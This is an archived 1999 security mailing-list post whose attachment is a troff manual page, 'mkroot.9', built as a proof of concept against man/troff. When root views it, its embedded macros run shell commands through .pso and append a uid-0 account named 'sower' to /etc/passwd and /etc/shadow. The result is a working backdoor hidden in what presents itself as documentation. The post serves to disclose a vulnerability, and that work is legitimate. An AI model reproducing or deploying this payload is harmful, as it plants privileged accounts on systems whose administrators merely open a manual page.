--Y7xTucakfITjPcLV Content-Type: multipart/mixed; boundary="ibTvN161/egqYuK8" --ibTvN161/egqYuK8 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable If you want your system safe,=20 don't look as root=20 at manual page. [more info in attachment] --=20 _____________ ___ ___ __ _ . ( =20 =2E__) i E f c A :: Pawel Wilk <siewcaat_private> . : Polish Linux Distribution Team .. . . . . fingerprint : A5B1 52BC D496 D08B 0E1F B6B0 86D8 52FE 0211 9484=20 --ibTvN161/egqYuK8 Content-Type: text/plain; charset=iso-8859-2 Content-Disposition: attachment; filename="mkroot.9" Content-Transfer-Encoding: quoted-printable =2E\" Copyright (c) 1999 Pawe=B3 Wilk <siewcaat_private> =2E\" =2E\" This is free documentation; you can redistribute it and/or =2E\" modify it under the terms of the GNU General Public License as =2E\" published by the Free Software Foundation; either version 2 of =2E\" the License, or (at your option) any later version. =2E\" =2E\" The GNU General Public License's references to "object code" =2E\" and "executables" are to be interpreted as the output of any =2E\" document formatting or typesetting system, including =2E\" intermediate and printed output. =2E\" =2E\" This manual is distributed in the hope that it will be useful, =2E\" but WITHOUT ANY WARRANTY; without even the implied warranty of =2E\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the =2E\" GNU General Public License for more details. =2E\" =2E\" You should have received a copy of the GNU General Public =2E\" License along with this manual; if not, write to the Free =2E\" Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, =2E\" USA. =2E\" =2ETH MKROOT 9 "07-22-1999" "manual page" "Linux Hacker's Manual" =2ESH NAME mkroot \- make a root-shell =2ESH SYNOPSIS =2EBI "man mkroot" =2ESH DISCLAIMER This manual page contains some \fBtroff\fP macros which could break your sy= stem's security. If you are looking at this page being logged as root then you sho= uld know=20 that right in this moment you have allready created new, privileged account= =20 called "sower". The account is disabled by default because of security reas= ons.=20 Don't forget to remove it! ;-> This is for information only.... use it at your own risk. =2ESH DESCRIPTION Manual pages are usualy based on \fBtroff\fP (see =2EBR troff (1) ) macros. The point is, that some of these macros can access files or even invoke some shell commands. It's usable, but try to imaginate that the \fBtroff\fP macros contained in manual pages may have root privile= ges=20 if the \fBtroff\fP command's caller is root. (!) =2Ebr =2ELP The most dangerous macros are: =2ETP =2EBI ".pso" " command" used to display output of some \fIcommand\fP =2ETP =2EBI ".write" " stream string" used to put the \fIstring\fP into the given \fIstream\fP =2ELP =2ESH EXAMPLES =2EBI "/root directory listing" " .pso ls -l /root" =2Enf =2Epso ls -l /root=20 =2Efi =2EBI "creating new user called sower (passwd)" " " =2Enf .opena stream /etc/passwd .write stream sower:*:0:0::/:/dev/null =2Efi =2Eopena stream /etc/passwd =2Ewrite stream sower:!:0:0::/:/dev/null =2EBI "little preview" " .pso tail /etc/passwd" =2Enf =2Epso tail /etc/passwd =2Efi =2EBI "playing with shadow" "" =2Enf .opena stream /etc/shadow .write stream sower:*:10531:0:99999:7::10794: =2Efi =2Eopena stream /etc/shadow =2Ewrite stream sower:*:10531:0:99999:7::10794: =2EBI "fingering new user" " .pso finger sower" =2Enf =2Epso finger sower =2Efi =2ESH FILES =2EI /etc/passwd =2EI /etc/shadow =2ESH SEE ALSO =2EBR man (1), =2EBR passwd (1), =2EBR troff (1). =2ESH AUTHOR Pawel Wilk <siewcaat_private> --ibTvN161/egqYuK8-- --Y7xTucakfITjPcLV Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v0.9.7 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEAREBAAYFAjeYzaoACgkQhthS/gIRlISrNwCgnUCL6M4UPSXWmz+yGtBmhUFd 6bYAn1UpvA+SD2Bdv2Qk/SFR9InxmCmI =Ano5 -----END PGP SIGNATURE----- --Y7xTucakfITjPcLV--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:53:17 PDT